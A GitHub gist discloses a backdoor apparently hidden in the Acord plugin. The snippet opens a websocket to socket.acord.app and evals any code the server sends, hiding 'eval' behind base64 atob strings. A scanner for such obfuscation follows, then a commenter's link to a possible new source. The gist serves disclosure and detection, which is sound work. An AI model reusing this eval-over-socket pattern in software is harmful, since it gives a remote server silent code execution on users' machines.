Last active October 8, 2024 16:19
Acord Eval Backdoor
```js
// This code can be found in Acord's code in an obfuscated form. Just search for the socket url or one of the atob strings and you will
// find it.
// Permanent Link to their Repo (they might delete this):
// https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js
// Permanent Link (fork):
// https://github.com/Vendicated/acord-is-malware/blob/main/fixture/extension.js
// Archive Link:
// https://web.archive.org/web/20230115234723/https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js
const connection = socketIo.connect("https://socket.acord.app/", { autoConnect: !1, reconnection: !0, transports: ["websocket"] });
connection.on(atob("OmV2YWx1YXRl") /* :evaluate */, async (code, callback) => {
    try {
        let data = await window[atob("ZXZhbA==") /* eval */](code);
        callback({ ok: true, data: data });
    } catch (t) {
        callback({ ok: false, error: `${t}` });
    }
});
```
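The comment at the top of the file says the obfuscated code can be located by searching for the `atob` strings. As an added example (not part of the original gist or of Acord's code), this Node.js scanner decodes every `atob("...")` literal in a source text and flags the ones that resolve to code-execution globals or that are used as a computed property on `window`; the `SENSITIVE` list, the function names and the sample input are assumptions made for illustration.

```javascript
// Added example: flag base64-hidden identifiers in extension JavaScript.
// SENSITIVE and the sample below are constructed for illustration.
const SENSITIVE = new Set(["eval", "Function", "setTimeout", "setInterval", "importScripts"]);

// Decode a base64 literal; return null if it is not valid, printable base64.
function decodeLiteral(b64) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(b64) || b64.length % 4 !== 0) return null;
  const text = Buffer.from(b64, "base64").toString("latin1");
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

// Return one finding per atob("<literal>") call found in the source text.
function scanSource(source) {
  const findings = [];
  // Group 1 is set when the call is used as a computed key on a global object.
  const re = /(\b(?:window|globalThis|self)\s*\[\s*)?atob\(\s*(["'`])([^"'`]+)\2\s*\)/g;
  source.split("\n").forEach((line, i) => {
    for (const m of line.matchAll(re)) {
      const decoded = decodeLiteral(m[3]);
      if (decoded === null) continue;
      const computedGlobal = Boolean(m[1]);
      findings.push({
        line: i + 1,
        literal: m[3],
        decoded,
        computedGlobal, // window[atob(...)] hides which global is being called
        severity: SENSITIVE.has(decoded) || computedGlobal ? "high" : "review",
      });
    }
  });
  return findings;
}

// Constructed sample mirroring the handler shown in this gist.
const sample = [
  'conn.on(atob("OmV2YWx1YXRl"), async (code, cb) => {',
  '  let data = await window[atob("ZXZhbA==")](code);',
  '  cb({ ok: true, data });',
  '});',
].join("\n");

console.log(scanSource(sample));
```

Literal-only matching misses strings that are concatenated or built at runtime, so treat a clean result as inconclusive and also review any socket handler that passes received data to a dynamically resolved function.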
It seems that the link you have mentioned in this gist has been deleted. However, after doing some digging, I have located a potential updated source link organization:
https://github.com/acord-standalone